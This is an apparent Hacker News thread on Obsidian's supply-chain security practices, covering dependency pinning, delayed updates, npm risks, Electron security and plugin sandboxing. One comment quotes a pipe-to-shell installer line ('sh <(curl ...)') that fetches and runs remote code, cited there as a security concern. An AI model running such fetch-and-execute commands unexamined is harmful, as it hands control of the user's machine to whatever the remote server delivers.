That just sounds like Linux packages; also not a system known for security of desktop apps and scripts especially compared to MacOS, shoot me.
Operating systems are different though, since their whole purpose is to host _other_ applications.
FWIW, MacOS isn't any better or worse for security than any other desktop OS tbh....
I mean, MacOS just had it's "UAC" rollout not that long ago... and not sure about you, but I've encountered many times where someone had to hang up a Zoom or browser call because they updated the app or OS, and had to re-grant screenshare permissions or something. So, not that different. (Pre-"UAC" versions of MacOS didn't do any sandboxing when it came to user files / device access)
The Simpsons Springfield Nuclear Plant Security scene in real life.
https://www.youtube.com/watch?v=eU2Or5rCN_Y
Yes, you are responsible for all the code you ship to your users. Not pinning dependencies is asking for trouble. It is literally, "download random code from the Internet and hope for the best."
Pinning dependencies also means you're missing any security fixes that come in after your pinned versions. That's asking for trouble too, so you need a mechanism by which you become aware of these fixes and either backport them or upgrade to versions containing them.
Things like dependabot or renovate solves the problem of letting you know when security updates are available, letting you have your cake and eat it too.
[dead]
All code is fundamentally not ever secure.
This statement is one of those useless exercises in pedantry like when people say "well technically coffee is a drug too, so..."
Code with publicly-known weaknesses poses exponentially more danger than code with unknown weaknesses.
It's like telling sysadmins to not waste time installing security patches because there are likely still vulnerabilities in the application. Great way to get n-day'd into a ransomware payment.
Have you spent time reviewing the security patches for any nontrivial application recently? 90% of them are worthless, the 10% that are actually useful are pretty easy to spot. It's not as big of a deal as people would like to have you think.
That's why I run Windows 7. It's going to be insecure anyways so what's the big deal?
Pinned dependencies usually have their own dependencies so you are generally always downloading random code and hoping.
I mean, jeeze, how much code comes along for the ride with Electron...
The real answer is to minimize dependencies (and subdependencies) to the greatest extent practical. In some cases you can get by with surprisingly few without too much pain (and in the long run, maybe less pain than if you'd pulled in more).
Yep, and for the rest I've gotten a lot of mileage, when shipping server apps, by deploying on Debian or Ubuntu* and trying to limit my dependencies to those shipped by the distro (not snap). The distro security team worries about keeping my dependencies patched and I'm not forced to take new versions until I have to upgrade to the next OS version, which could be quite a long time.
It's a great way to keep lifecycle costs down and devops QoL up, especially for smaller shops.
*Insert favorite distro here that backports security fixes to stable package versions for a long period of time.
No. "Always downloading random code and hoping" is not the only option. Even w/ the supply-chain shitshow that the public npmjs registry has become, using pnpm and a private registry makes it possible to leverage a frozen lockfile that represents the entire dependency graph and supports vulnerability-free reproducible builds.
EDIT to add: Of course, reaching a state where the whole graph is free of CVEs is a fleeting state of affairs. Staying reasonably up-to-date and using only scanned dependencies is an ongoing process that takes more effort and attention to detail than many projects are willing or able to apply; but it is possible.
> We do not run postinstall scripts. This prevents packages from executing arbitrary code during installation.
I get the intent, but I’m not sure this really buys much. If a package is compromised, the whole thing is already untrustworthy and skipping postinstall doesn’t suddenly make the rest of the code safe. If it isn’t compromised, then you risk breaking legitimate installation steps.
From a security perspective, it feels like an odd tradeoff. I don’t have hard data, but I’d wager we see far more vulnerabilities patched through regular updates than actual supply-chain compromises. Delaying or blocking updates in general tends to increase your exposure rather than reduce it.
There’s some advice that’s been going around lately that I’ve been having trouble understanding: the idea that you should not be updating your dependencies when new patches are released (e.g., X.X.PATCH).
I understand that not updating your dependencies when new patches are released reduces the chance of accidentally installing malware, but aren’t patches regularly released in order to improve security? Wouldn’t it generally be considered unwise to not install new patches?
There's a key missing piece to this puzzle: being informed about _why_ you're updating and what the patches are.
Nobody has time to read source code, but there are many tools and services that will tell you brief summaries of release notes. Npm Audit lists security vulnerabilities in your package versions for example.
I do adopt the strategy of not updating unless required, as updates are not only an attack vector, but also an extremely common source of bugs that'd I'd prefer to avoid.
But importantly I stay in the loop about what exploits I'm vulnerable to. Packages are popping up with vulnerabilities constantly, but if it's a ReDoS vulnerability in part of the package I definitely don't use or pass user input to? I'm happy to leave that alone with a notice. If it's something I'm worried another package might use unsafely, with knowledge of the vulnerability I can decide how important it is, and if I need to update immediately, or if I can (preferably) wait some time for the patch to cook in the wild.
That is the important thing to remember about security in this context: it is an active, continuous, process. It's something that needs to be tuned to the risk tolerance and risk appetite of your organisation, rather than a blanket "never update" or "always update" - for a well-formed security stance, one needs more information than that.
Exactly. If you can avoid having to do _any_ patches except those that have a security purpose you've already reduced your risk to supply chain attacks considerably.
This isn't trivial to organise though since semver by it's self doesn't denote when a patch is security related or not. Of course, you can always review the release notes but this is time consuming, and doesn't scale well when a product grows either in size of code base or community support.
This is where there's a fairly natural place for SAST (E.g., Semgrep, Snyk (many more but these are the two I've used the most, in no particular order)), and supply chain scans fall in place, but they're prohibitively expensive.
There is a lot of open source tooling out there that can achieve the same too of course.
I've found there's a considerable linear climb with overheads/TOIL and the larger the number of open source tools you commit to create a security baseline. Unfortunately, this realistically means most companies where time is scarcer than money, means more money shifts into closed source products like those I listed, rather than those ran by open source products/companies.
I believe it's about waiting a bit before a new patch is released, not fully avoiding installing updates. Seems like compromises are being caught quickly these days, usually within hours. There are multiple companies monitoring npm package releases because they sell security scanning products and so it's part of their business to be on top of it.
pnpm has a setting that you can tell it that a package needs to be at least X minutes old in order to install it. I would wait at least 24 hours just to be safe
https://pnpm.io/settings#minimumreleaseage
To be honest, right now I'm thinking about isolating of build process for frontend on my local environment. It is seems not hard to send my local environment variables like OPENAI_API_KEY or .ssh/* to some remote machine.
I know it is not very different comparing to python or projects in any other language. But I don't feel that I cannot trust node/js community at this point.
Running vite inside a docker container would probably get you what you want
I don't think you even need a container for that type of containment.
You could do it with namespaces.
I think node/whatever-js-run-time/package-manger could allow for namespaced containment for packages with simple modern linux things.
The realms proposal was a step towards that at one time.
I’ve been using other apps than Obsidian for notes and sharing, so this is nice to read and consider. But isn’t Obsidian an electron app or whatever? Electron has always seemed resource intensive and not native. JavaScript has never struck me as “secure”. Am I just out of touch?
JavaScript is a very secure language. The browser is a massive success at running secure JavaScript on a global scale. Every website you use is running JavaScript and not able to read other site data. Electron is the same, running v8 to sandbox JavaScript. Assuming you aren't executing user input inside that sandbox (something many programming languages allow, including JS), it's very secure.
The problem with supply chain attacks is specifically related to npm, and not related to JS. npm as an organization needs to be taking more responsibility for the recent attacks and essentially forcing everyone to use more strict security controls when publishing their dependencies.
I need more evidence to believe this.
Doesn’t this mean browser sandboxing is secure, not JS? Or are you referring to some specific aspect of JS I’m not aware of? (I’m not aware of a lot of JS)
It’s maybe a nit-pick, since most JS is run sandboxed, so it’s sort of equivalent. But it was explicitly what GP asked for. Would it be more accurate to say Electron is secure, not JS?
I mean, JavaScript doesn’t even have APIs for reading a file from disk, let alone executing an arbitrary binary. (Anything similar comes from a runtime like NodeJS.) You can’t access memory in different JS processes… so what would make it insecure?
To be fair, a plugin system built on JS with all plugins interacting in the same JS context as the main app has some big risks. Anything plugin can change definitions and variable in the global scope with some restrictions. But any language where you execute untrusted code in the same context/memory/etc as trusted code has risks. the only solution is sandboxing plugins
I'm really curious about this comment. What would it mean for a programming language to be secure?
Any two Turing-complete programming languages are equally secure, no?
Surely the security can only ever come from whatever compiles/interprets it? You can run JavaScript on a piece of paper.
Turing completeness is irrelevant, as it only addresses computation. Security has to do with system access, not computational capacity. Brainfuck is Turing complete, but lacks any primitives to do more than read from a single input stream and write to a single output stream. Unless someone hooks those streams up to critical files, you can't use it to attack a system.
Language design actually has a lot of impact on security, because it defines what primitives you have available for interacting with the system. Do you have an arbitrary syscall primitive? Then the language is not going to help you write secure software. Is your only ability to interact with the system via capability objects that must be provided externally to authorize your access? Then you're probably using a language that put a lot of thought into security and will help out quite a lot.
A number of operating system security features, such as ASLR, exist because low level languages allow reading and writing memory that they didn't create.
Conversely, barring a bug in the runtime or compiler, higher level languages don't enable those kinds of shenanigans.
See for example the heart bleed bug, where openssl would read memory it didn't own when given a properly malformed request.
Javascript is probably one of the most used, depending on how you measure it, languages on earth.
It runs on a majority of computers and basically all phones. There will be many security issues that get discovered b y virtue of these facts.
What makes you think that "native" apps are any more secure?
No, it's not really an issue. GitHub and VS Code are also Electron apps. So are Slack and Discord. Postman is, as well.
I'd also be forced to ask... what exactly are you doing with a markdown note-taking application such that performance is a legitimate concern?
But, I mean, maybe you're reading this in a Lynx session on your ThinkPad 701C.
> what exactly are you doing with a markdown note-taking application such that performance is a legitimate concern?
Launching it and expecting a fast startup.
It is resource intensive.
It's not a problem on pc, but an obsidian vault with thousands of notes can have a laggy startup on mobile, even if you disable plugins.
Users sidestep this issue with quick capture plugins and apps, but I wish there was a native stripped-down version of obsidian.
Not a huge electron fan (thank god for tauri), but Obsidian is a fantastic app and you shouldn't let the electron put you off of it. You can even hook a MCP up to it and an agent can use it as a personal knowledge base, it's quite handy.
> Thank god for tauri
I’d love to try it, but speaking of security, this was the first thing I saw:
sh <(curl https://create.tauri.app/sh)
Right. But you know how to fetch and inspect (yea?) so, I with you that piping random crap to sh is bad. Maybe these snips encourage that behavior.
Tauri is trustable (for some loose definition) and the pipe to shell is just a well known happy-path.
All that to say it's a low value smell test.
Also, I'm in the camp that would rather git clone and then docker up. My understanding is it gives me a littl more sandbox.
Javascript is a lot more secure than C++, since it's a memory managed language.
Buffer overflows are 0.001 percent of security incidents in practice.
Let's fix private key leakage and supply chain issues before worrying about C++ haxxors p0wning your machines.
If you have to render html, which is what markdown ultimately becomes, you might as well use a web broswer.
These practices are very similar to what I've done in the past, for a large, sensitive system, and they worked very well.
(IIUC, we actually were the first to get a certain certification for cloud deployment, maybe because we had a good handle on this and other factors.)
From the language-specific network package manager, I pulled the small number of third-party packages we used into the filesystem tree of system's repo, and audited each new version. And I disabled the network package manager in the development and deployment environments, to make it much harder for people to add in dependencies accidentally.
Dependencies outside this were either from the Linux distro (nice, because well-managed security updates), or go in the `vendor` or `ots` (off-the-shelf) trees of the repo (and are monitored for security updates).
Though, I look at some of the Python, JS, or Rust dependency explosions I sometimes see -- all dependent on being hooked up to the language's network package manager, with many people adding these cavalierly -- and it becomes a much harder problem.
If the obsidian team did a 2 hour q&a livestream every week, I'd watch every one (or at least get the AI summary). One of my favorite pieces of software ever.
I recently had a similar experience using Libby for the first time.
An absolutely incredible piece of software. If anyone here on HN works on it, you deserve to be proud of your work.
Going to preface this post by saying I use and love Obsidian, my entire life is effectively in an Obsidian vault, I pay for sync and as a user I'm extremely happy with it.
But as a developer this post is nonsense and extremely predictable [1]. We can expect countless others like it that explains how their use of these broken tools is different and just don't worry about it!
By their own linked Credits page there are 20 dependencies. Let's take one of those, electron, which itself has 3 dependencies according to npm. Picking one of those electron/get has 7 dependencies. One of those dependencies got, has 11 dependencies, one of those cacheable-request has 7 dependencies etc etc.
Now go back and pick another direct dependency of Obsidian and work your way down the dependency tree again. Does the Obsidian team review all these and who owns them? Do they trust each layer of the chain to pick up issues before it gets to them? Any one of these dependencies can be compromised. This is what it means to be. supply chain attack, you only have to quietly slip something into any one of these dependencies to have access to countless critical user data.
[1] https://drewdevault.com/2025/09/17/2025-09-17-An-impossible-...
To be fair, the electron project likely invests some resources in reviewing it's own dependencies, because of its scale. But yeah this is a good exercise, I think we need more systems like Yocto which prioritize complete understanding of the entire product from source.
Coincidentally I did that yesterday. Mermaid pulls in 137 dependencies. I love Obsidian and the Obsidian folks seem like good people but I did end up sandboxing it.
Love it. Jonathan Blow had a nice thread about dependencies a while back: https://x.com/Jonathan_Blow/status/1924509394416632250
This is obviously the way to do it, assuming you have the skills and resources to operate in this manner. If you don't, then godspeed, but you have to know going in that you are trading expediency now for risk later. Risk of performance issues, security vulnerabilities, changes in behavior, etc. And when the mess inevitably comes, at whatever inopportune time, you don't really get to blame other people...
I also recommend using this site to evaluate the dependencies of your dependencies:
https://npmgraph.js.org/?q=express
I installed an AppArmor profile for Obsidian. For an application that displays text files, it needed a lot of permissions. It would refuse to run without network access.
You can install Obsidian flatpak and lock it down with flatseal.
"The other packages help us build the app and never ship to users, e.g. esbuild or eslint."
Still, they can present a security risk by injecting malware at build time
No mention of plugins, which are a core differentiator of Obsidian, so part of the overall "supply chain" for the app.
I've been using Roam Research since about 2020. Is Obsidian better?
Haven’t used Roam, but what I like about Obsidian:
- All your data is just plain files on your file system. Automation and interop are great, including with tools like Claude Code.
- It’s local-first, so performance is good.
- It’s extensible. Write extensions in HTML, CSS, and JS.
- It’s free.
- Syncing files is straightforward. Use git, Syncthing, Google Drive, or pay for their cheap sync service which is quite good.
- Product development is thoughtful and well done.
- They’re explicitly not trying to lock you in or own your data. They define open specs and build on them when Markdown doesn’t cut it.
Things you might not like:
- Their collaboration story isn’t great yet. No collaborative editing.
- It’s an Electron app.
Was hoping they outlined their approach to handling potentially compromised packages running on dev machines prior to even shipping. That seems like a much harder problem to solve.
> We don’t rush upgrades.
Can’t wait for “implements mechanism to delay application of new patches” to start showing up compliance checklists. My procrastination will finally pay off!
What about the third party extensions?
I love Obsidian and wish I could make it my default markdown handler on Windows.
While we're on the topic: what's your default markdown handler on Windows?
Not my favorite but I was surprised recently when Windows 11 Notepad popped up something mentioning markdown support.
I love Obsidian dearly, but if you build an app that's only really useful with plugins, and that has a horrifyingly bad security model for plugins and little to no assurance of integrity of the plugins...
Maybe, just maybe, don't give fullmouthed advice on reducing risk in the supply chain.
But what about VScode?
'It may sound obvious but the primary way we reduce the risk of supply chain attacks is to avoid depending on third-party code."
What a horribly disingenuous statement, for a product that isn't remotely usable without 3rd-party plugins. The "Obsidian" product would be more aptly named "Mass Data Exfiltration Facilitator Pro".
I've used Obsidian for years without a single 3rd party plugin.
It is possible to make your same point without histrionic excess.
Yeah, this is always the response. Usability can be assessed objectively, so you just have low standards.
I have to agree that I don't find plugins necessary, and I'm not sure why you're so down on people using a solid backlinking note taker. I don't think I have low standards, I think Roam and Logseq aren't that great and Obsidian is all I need.
Has there been a supply chain attack with an LLM conduit yet? Because that would be spicy and is assuredly possible and plausible too.
Absolutely love Obsidian but had to stop using it because Electron apps don't play well with Wayland. After lots of tinkering around with flags and settings for compatibility layers, it became obvious that it would never work seamlessly like it did on Windows (and probably does on x11). So it was either give up Wayland compositors or give up Obsidian. Luckily I don't use any plugins, so moving to other software was easy, but I still would prefer Obsidian. Electron's "works everywhere" works about as good as Java's "works everywhere", which is to say it works great, until it doesn't, at which point it's a mess of tinkering.
If you use Wayland and it works for you, that's great, but it's not my experience.
In my experience electron + Wayland was absolutely god awful for a long time, but it got dramatically better in the last 4-5ish months. So depending on when you last tried it, might be worth a revisit. Heavily depends on which GPU+DE though, Nvidia+Plasma here.
I wish they could add Google Drive support to their mobile app. I'd be happy to pay $100+ for one-time-only Google Drive support.
missed opportunity for "less is secure"
"Secure" is a different, harder promise than safeR.
but still along the same lines as "safer". the stresses are different, "safer" has the stress as "SAY-fer" and "secure" has the stress as "sih-KYOOR". the latter sounds more similar (and rhymes better) with "more", the originator of the phrase "less is more"
Well uh sure if meter's all you're going for here
> The other packages help us build the app and never ship to users, e.g. esbuild or eslint.
Eslint with such wonderful dependencies like is-glob smh
[dead]
This doesn't make any sense to me. I've always been told you don't write anything yourself unless you absolutely have to and having a million micro-dependencies is a good thing. JavaScript and now Rust devs have been saying this for years. Surely they know what they're doing...
There is a balance to be struck. NPM in particular has been a veritable dependency hell for a long time. I don't know if it just attracts inexperienced developers, or if its security model is fundamentally flawed, but there have been soooo many supply chain attacks using NPM that being extra careful is very much warranted.